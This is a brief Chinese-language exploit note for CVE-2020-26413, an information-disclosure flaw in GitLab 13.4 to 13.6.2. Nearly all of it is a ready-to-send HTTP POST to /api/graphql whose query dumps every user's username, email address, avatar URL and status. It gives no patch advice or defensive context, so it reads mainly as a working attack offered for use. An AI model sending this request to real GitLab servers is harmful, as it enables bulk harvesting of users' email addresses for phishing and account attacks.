GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413

GitLab 13.4 – 13.6.2

访问 URL http://xxx.xxx.xxx.xxx/-//graphql-explorer

具体的包

POST /api/graphql HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 212
Content-Type: application/json

{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}